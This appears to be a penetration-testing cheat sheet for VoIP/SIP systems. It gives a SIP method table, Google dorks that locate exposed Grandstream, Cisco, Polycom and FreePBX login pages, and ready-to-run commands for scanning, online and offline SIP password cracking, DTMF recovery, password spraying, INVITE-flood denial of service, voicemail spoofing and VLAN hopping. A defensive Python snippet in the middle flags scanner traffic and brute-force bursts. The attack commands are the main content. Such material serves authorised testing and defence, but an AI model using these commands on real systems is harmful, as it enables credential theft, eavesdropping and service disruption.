VoIP

Basic Messages

Request name  Description                                                                 RFC references
--------------------------------------------------------------------------------------------------------
REGISTER      Register a SIP user.                                                        RFC 3261
INVITE        Initiate a dialog for establishing a call.                                  RFC 3261
ACK           Confirm that an entity has received a final response to an INVITE request.  RFC 3261
BYE           Signal termination of a dialog and end a call.                              RFC 3261
CANCEL        Cancel any pending request.                                                 RFC 3261
UPDATE        Modify the state of a session without changing the state of the dialog.     RFC 3311
REFER         Ask recipient to issue a request for the purpose of call transfer.          RFC 3515
PRACK         Provisional acknowledgement.                                                RFC 3262
SUBSCRIBE     Initiate a subscription for notification of events from a notifier.         RFC 6665
NOTIFY        Inform a subscriber of notifications of a new event.                        RFC 6665
PUBLISH       Publish an event to a notification server.                                  RFC 3903
MESSAGE       Deliver a text message; used in instant messaging applications.             RFC 3428
INFO          Send mid-session information that does not modify the session state.        RFC 6086
OPTIONS       Query the capabilities of an endpoint.                                      RFC 3261

Enumeration

Google Dork

# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org

# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"

# Cisco phones
inurl:"NetworkConfiguration" cisco

# Linksys phones
intitle:"Sipura SPA Configuration"

# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm

# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"

Network Enumeration

# Using Nmap
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

# Using svmap
sudo apt install sipvicious

# Use --fp to fingerprint the services
svmap 10.10.0.0/24 -p 5060-5070 [--fp]

# Metasploit
auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)

# sippts
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]

Methods Enumeration

# sippts method enumeration
sippts enumerate -i 10.10.0.10

VoIP Attacks

Password Brute Force (Online)

# Install sipvicious
sudo apt install sipvicious

# Crack the password of a known extension (100) with a dictionary
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080

# Try numeric passwords 0001-9999 (zero-padded to 4 digits) for extension 100
svcrack -u100 -r1-9999 -z4 10.0.0.1

# SIPPTS rcrack
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
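As an added defensive example (not part of the original notes), the following Python parses SIP request lines against the method table above and flags the traffic that the scanners and online brute-forcers in this section generate: the SIPVicious default User-Agent "friendly-scanner" and a burst of REGISTER requests from one source. The sample messages, the IP addresses and the alert threshold are constructed for the example.

```python
import re
from collections import Counter

# Request methods listed in the Basic Messages table (RFC 3261, 3311, 3515, 3262, 6665, 3903, 3428, 6086).
KNOWN_METHODS = {"REGISTER", "INVITE", "ACK", "BYE", "CANCEL", "UPDATE", "REFER",
                 "PRACK", "SUBSCRIBE", "NOTIFY", "PUBLISH", "MESSAGE", "INFO", "OPTIONS"}
# "friendly-scanner" is the default User-Agent of SIPVicious (svmap/svcrack); the others are common scanner UAs.
SCANNER_UA = re.compile(r"friendly-scanner|sipvicious|sipcli|sipsak", re.I)
REGISTER_THRESHOLD = 5  # REGISTER requests from one source in the sample before we alert (tune per PBX)

def parse_request(raw):
    """Return (method, request_uri, headers) for a SIP request, or None for responses/garbage."""
    lines = raw.strip().splitlines()
    m = re.match(r"([A-Z]+)\s+(\S+)\s+SIP/2\.0$", lines[0]) if lines else None
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return m.group(1), m.group(2), headers

def analyse(messages):
    """messages: iterable of (source_ip, raw_sip_text). Returns a list of alert strings."""
    alerts, registers = [], Counter()
    for src, raw in messages:
        parsed = parse_request(raw)
        if parsed is None:
            continue
        method, _uri, hdrs = parsed
        ua = hdrs.get("user-agent", "")
        if method not in KNOWN_METHODS:
            alerts.append(f"{src}: unexpected SIP method {method}")
        if SCANNER_UA.search(ua):
            alerts.append(f"{src}: scanner User-Agent '{ua}' sent {method}")
        if method == "REGISTER":
            registers[src] += 1
    for src, n in registers.items():
        if n >= REGISTER_THRESHOLD:
            alerts.append(f"{src}: {n} REGISTER requests, possible extension/password brute force")
    return alerts

# Constructed sample traffic (not a real capture): one OPTIONS sweep and six REGISTER attempts
# from a scanner host, plus one legitimate INVITE from a desk phone.
SAMPLE = [("10.10.0.50", "OPTIONS sip:100@10.10.0.10 SIP/2.0\r\nUser-Agent: friendly-scanner\r\n")]
SAMPLE += [("10.10.0.50", f"REGISTER sip:10.10.0.10 SIP/2.0\r\nTo: <sip:{100 + i}@10.10.0.10>\r\n"
                          "User-Agent: friendly-scanner\r\n") for i in range(6)]
SAMPLE.append(("10.10.0.20", "INVITE sip:101@10.10.0.10 SIP/2.0\r\nUser-Agent: DeskPhone/1.0\r\n"))
```

Run `analyse(SAMPLE)` to get the alert list; in practice the messages would come from a PBX log or a capture.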

VoIP Sniffing

Brute Force Credentials - Offline

# Install sipcrack
apt-get install sipcrack

# Extract digest authentication from a pcap file and bruteforce
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

# Extract digest information
sippts dump -f capture.pcap -o data.txt

# Crack digest information
sippts dcrack -f data.txt -w wordlist/rockyou.txt

# Extract data of SIP protocol from a PCAP file
sippts tshark -f capture.pcap [-filter auth]

DTMF Codes

SIP credentials are not the only secrets that can be found in network traffic: DTMF codes, used for example to access the voicemail, can also be recovered. These codes may be sent in SIP INFO messages, in the audio itself, or inside RTP packets. If the codes are inside RTP packets, you can cut that part of the conversation and use the tool multimon to extract them:

multimon -a DTMF -t wav pin.wav

Password Spraying

# Metasploit
use auxiliary/voip/viproy_sip_brutef

Denial of Service

# Install inviteflood
sudo apt install inviteflood

# Run
inviteflood eth0 101 192.168.106.129 192.168.106.129 10000000

Voicemail Spoofing

Voicemail spoofing is possible because the signalling is unencrypted, which lets us manipulate the parameters of the INVITE request to impersonate anyone we like.

inviteflood eth0 102 192.168.106.129 192.168.106.129 1 -a "test"

VLAN Hopping

In a properly configured environment, VoIP traffic is placed on a dedicated VLAN known as the Voice VLAN. Ideally this VLAN is completely segregated from the office network (DATA VLAN), which prevents an attacker from intercepting VoIP traffic with a sniffing tool. VLAN hopping is the ability to jump from the VoIP network to the office network.

VoipHopper has a feature called Assessment Mode that is especially useful if we don't know whether we are dealing with well-known IP phones such as Cisco, AVAYA, etc.

# Install voiphopper
sudo apt install voiphopper

# Load the 802.1q kernel module on the assessment VM
sudo modprobe 8021q

# VLAN hopping using assessment mode
voiphopper -i eth0 -z

# Hopping with known VLAN ID
voiphopper -i eth0 -v 30

If successful, we should see a new VLAN added to the interface we specified (eth0 in our example).
